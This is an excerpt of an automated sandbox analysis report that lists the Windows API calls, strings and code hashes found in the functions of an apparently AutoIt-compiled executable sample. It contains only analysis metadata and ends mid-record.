                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$AddressCreateInstanceProc
                • String ID: DllGetClassObject
                • API String ID: 753597075-1075368562
                • Opcode ID: 027e784bad4b72cd3f37d7259198eb5b222be64a09ba879177c7ba29572b996e
                • Instruction ID: 208078b2e4ad228b5d3c40f7b7ec343983db9b014c11b71fe77a0b6fe8935b7f
                • Opcode Fuzzy Hash: 027e784bad4b72cd3f37d7259198eb5b222be64a09ba879177c7ba29572b996e
                • Instruction Fuzzy Hash: 6E416D71A04204EFDB15CF94C884A9A7BB9EF45310F15C0ADBD19DF28AD7B1DA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A3E35
                • IsMenu.USER32(?), ref: 001A3E4A
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A3E92
                • DrawMenuBar.USER32 ref: 001A3EA5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: f3b3986fc1482eaeb77f19f99705dbb0c9135949acbcc6d6c71a7803e71b1aab
                • Instruction ID: 9210dcd4432f20451e6294e8f8443809c32fa477d272e9c932be06d0197fb78a
                • Opcode Fuzzy Hash: f3b3986fc1482eaeb77f19f99705dbb0c9135949acbcc6d6c71a7803e71b1aab
                • Instruction Fuzzy Hash: B6413B79A01209EFDB10DF50D884EEABBB5FF4A355F04412AF915AB250D730AE45CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00171E66
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00171E79
                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00171EA9
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$ClassName
                • String ID: ComboBox$ListBox
                • API String ID: 2081771294-1403004172
                • Opcode ID: de3750bfefb00cc7d70404ff92f944504ed95f8b976d04420a43bee3fbad3c5d
                • Instruction ID: e51fedaea1c5ee368080285af8d6f52ae4d7e36ad1cfeb9bda8bae35878324b9
                • Opcode Fuzzy Hash: de3750bfefb00cc7d70404ff92f944504ed95f8b976d04420a43bee3fbad3c5d
                • Instruction Fuzzy Hash: 29217D71A00104BFDB199B68DC46CFFB7B9DF52350F108129F869A72E0DF344E469660
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001A2F8D
                • LoadLibraryW.KERNEL32(?), ref: 001A2F94
                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001A2FA9
                • DestroyWindow.USER32(?), ref: 001A2FB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$DestroyLibraryLoadWindow
                • String ID: SysAnimate32
                • API String ID: 3529120543-1011021900
                • Opcode ID: f1279b4d41a5647d4c5b7962bea58cf52813e6ff831fae4b9e6dd19fe0bc525b
                • Instruction ID: 7afc26ba616c2c042091c49c1687e5497d2653a33db8e431177f6df2e7c4b936
                • Opcode Fuzzy Hash: f1279b4d41a5647d4c5b7962bea58cf52813e6ff831fae4b9e6dd19fe0bc525b
                • Instruction Fuzzy Hash: 03219D75204209AFEB108FA8DC80FBB77BDEB5A364F104629F950D7190D771DC9197A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00134D1E,001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002), ref: 00134D8D
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00134DA0
                • FreeLibrary.KERNEL32(00000000,?,?,?,00134D1E,001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000), ref: 00134DC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 4c151747727c8d0700f09768eff38435a7df5a101688427f7eb41ff4ccebd2c4
                • Instruction ID: 5169bb528f494611cec6277fb7fd43f06b0ba1a2007092816823617cbc3d78fa
                • Opcode Fuzzy Hash: 4c151747727c8d0700f09768eff38435a7df5a101688427f7eb41ff4ccebd2c4
                • Instruction Fuzzy Hash: 26F03C35A40208ABDB119B94DC49BEEBFE5EF58751F0001A8F806A2660CB70AA80CAD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32 ref: 0016D3AD
                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0016D3BF
                • FreeLibrary.KERNEL32(00000000), ref: 0016D3E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: GetSystemWow64DirectoryW$X64
                • API String ID: 145871493-2590602151
                • Opcode ID: a2d56c9a3d889a7e225b576355e5b3c79f115c93d0a44fe43c6565e903ab15b0
                • Instruction ID: b53eca15dfdeabbaf08bd1b2582939b625a2d1927e3499a380bb04fc1e6a3523
                • Opcode Fuzzy Hash: a2d56c9a3d889a7e225b576355e5b3c79f115c93d0a44fe43c6565e903ab15b0
                • Instruction Fuzzy Hash: 5AF055B1F05A21DBD7751722AC289AD7720BF02B01F56809DF802F6210DB60CDA086C2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E9C
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00114EAE
                • FreeLibrary.KERNEL32(00000000,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EC0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-3689287502
                • Opcode ID: dc12808c9dbea617572c4192bc3d6c2b2fbb51e9e548cf56531c707ee477a719
                • Instruction ID: cb5daae160769d23131af17cf43b7f6b44f530ce2a7b13a796550195333f495e
                • Opcode Fuzzy Hash: dc12808c9dbea617572c4192bc3d6c2b2fbb51e9e548cf56531c707ee477a719
                • Instruction Fuzzy Hash: 1EE0CD35B035229BD23517257C18BDF6594AF83F62B050125FC04D2200DB64CD8148F5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E62
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00114E74
                • FreeLibrary.KERNEL32(00000000,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E87
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-1355242751
                • Opcode ID: 1ecc454328c9c4cedf1d860ed00baac2e2422dc35a72ef71fe52c83a3c35536f
                • Instruction ID: f2fe222de1193058b025c70a5c4e84a099d9fd26523618bedd9ea0c298ddd951
                • Opcode Fuzzy Hash: 1ecc454328c9c4cedf1d860ed00baac2e2422dc35a72ef71fe52c83a3c35536f
                • Instruction Fuzzy Hash: BED0123560362297A6261B257C18DCB6A58AF87F513050625F905E2114CF65CD8285E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcessId.KERNEL32 ref: 0019A427
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0019A435
                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0019A468
                • CloseHandle.KERNEL32(?), ref: 0019A63D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CloseCountersCurrentHandleOpen
                • String ID:
                • API String ID: 3488606520-0
                • Opcode ID: 3ececab733c86eb793df38bdd7d66a7a98715ca1d2b04aceef1926837bd9f6e2
                • Instruction ID: 329f021a98a9c3e7fbaa3ceb243bb08fd1adef4eddf1deef818793e50c617590
                • Opcode Fuzzy Hash: 3ececab733c86eb793df38bdd7d66a7a98715ca1d2b04aceef1926837bd9f6e2
                • Instruction Fuzzy Hash: 2CA1B1716043019FDB24DF28D886F2AB7E1AF98714F54881CF95A9B2D2DB70EC45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001B3700), ref: 0014BB91
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0014BC09
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E1270,000000FF,?,0000003F,00000000,?), ref: 0014BC36
                • _free.LIBCMT ref: 0014BB7F
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014BD4B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 1286116820-0
                • Opcode ID: de74933dad15567ffa918e3b5e682db7efb1abd79dc9ba26f2d49e06dc1ff710
                • Instruction ID: b42a06f82ae7898a0332f8f6ad865a3f49937ff7572e2e7ccf165285f861a0ef
                • Opcode Fuzzy Hash: de74933dad15567ffa918e3b5e682db7efb1abd79dc9ba26f2d49e06dc1ff710
                • Instruction Fuzzy Hash: 4F51B57190821AEFCB14EFA5DCC19AEB7B8EF55310B20466AE554D71B1EB30DE818B90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0017CF22,?), ref: 0017DDFD
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0017CF22,?), ref: 0017DE16
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • lstrcmpiW.KERNEL32(?,?), ref: 0017E473
                • MoveFileW.KERNEL32(?,?), ref: 0017E4AC
                • _wcslen.LIBCMT ref: 0017E5EB
                • _wcslen.LIBCMT ref: 0017E603
                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0017E650
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                • String ID:
                • API String ID: 3183298772-0
                • Opcode ID: e7c7af93001393851700d0735fad5c5c1272af60b8c2d348858cd2d76b177d0b
                • Instruction ID: 4a3bc3065be3ec81708230e4f512721723e43c094e4f507704859013181d98fa
                • Opcode Fuzzy Hash: e7c7af93001393851700d0735fad5c5c1272af60b8c2d348858cd2d76b177d0b
                • Instruction Fuzzy Hash: 8F5185B24083459BC724DB94DC919DF73ECAF99340F00496EF689D3191EF74A688C766
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BAA5
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019BB00
                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0019BB63
                • RegCloseKey.ADVAPI32(?,?), ref: 0019BBA6
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BBB3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                • String ID:
                • API String ID: 826366716-0
                • Opcode ID: 4b85d8fced51de4af793dfbf3c93125021d1c3ed2de0939e5c95b756e3ed5b67
                • Instruction ID: 6bc405c74f12cccfcd4d696a35af43dd3e59ae2fe6ab5123816654408287d77d
                • Opcode Fuzzy Hash: 4b85d8fced51de4af793dfbf3c93125021d1c3ed2de0939e5c95b756e3ed5b67
                • Instruction Fuzzy Hash: 2E61A131208241AFD718DF14D5D0E6ABBE5FF84308F54856CF49A8B2A2DB31ED85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 00178BCD
                • VariantClear.OLEAUT32 ref: 00178C3E
                • VariantClear.OLEAUT32 ref: 00178C9D
                • VariantClear.OLEAUT32(?), ref: 00178D10
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00178D3B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$Clear$ChangeInitType
                • String ID:
                • API String ID: 4136290138-0
                • Opcode ID: d709864343c1ce38dda7e7d63e60ad1a144c639499e4a56c88177a003f892423
                • Instruction ID: fbaafb8666ca04716ea70881d578bda79fe6898c9fd58e2546f6c9e79c7f5a6a
                • Opcode Fuzzy Hash: d709864343c1ce38dda7e7d63e60ad1a144c639499e4a56c88177a003f892423
                • Instruction Fuzzy Hash: BD5149B5A00619EFCB14CF68C894AAAB7F9FF8D314B158559E909DB350E730E911CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00188BAE
                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00188BDA
                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00188C32
                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00188C57
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00188C5F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: PrivateProfile$SectionWrite$String
                • String ID:
                • API String ID: 2832842796-0
                • Opcode ID: 0977e6811dcaea2e6350f413612181f301fe23656617cdffada90f92836f33cd
                • Instruction ID: 5084ae3a77622c228d9f022aeb318074908c26ed813e23acdcf669e617373988
                • Opcode Fuzzy Hash: 0977e6811dcaea2e6350f413612181f301fe23656617cdffada90f92836f33cd
                • Instruction Fuzzy Hash: 9B514F35A002159FCB05DF64C881AADBBF5FF49314F088469E849AB3A2DB31ED51CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00198F40
                • GetProcAddress.KERNEL32(00000000,?), ref: 00198FD0
                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00198FEC
                • GetProcAddress.KERNEL32(00000000,?), ref: 00199032
                • FreeLibrary.KERNEL32(00000000), ref: 00199052
                  • Part of subcall function 0012F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00181043,?,7644E610), ref: 0012F6E6
                  • Part of subcall function 0012F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0016FA64,00000000,00000000,?,?,00181043,?,7644E610,?,0016FA64), ref: 0012F70D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                • String ID:
                • API String ID: 666041331-0
                • Opcode ID: d8023cec3d193c260257fb6c956c2fe75fbf160226130cd7fb68c5530fef5c46
                • Instruction ID: 207e1cb31a6a1402112e723ea1c0512f723baee943e99d33cbcc3c81ca4c1748
                • Opcode Fuzzy Hash: d8023cec3d193c260257fb6c956c2fe75fbf160226130cd7fb68c5530fef5c46
                • Instruction Fuzzy Hash: 23515A34604205DFCB15DF68C4949ADBBF1FF5A314F0980A8E81A9B362DB31ED86CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001A6C33
                • SetWindowLongW.USER32(?,000000EC,?), ref: 001A6C4A
                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001A6C73
                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0018AB79,00000000,00000000), ref: 001A6C98
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001A6CC7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long$MessageSendShow
                • String ID:
                • API String ID: 3688381893-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCursorPos.USER32(?), ref: 00129141
                • ScreenToClient.USER32(00000000,?), ref: 0012915E
                • GetAsyncKeyState.USER32(00000001), ref: 00129183
                • GetAsyncKeyState.USER32(00000002), ref: 0012919D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
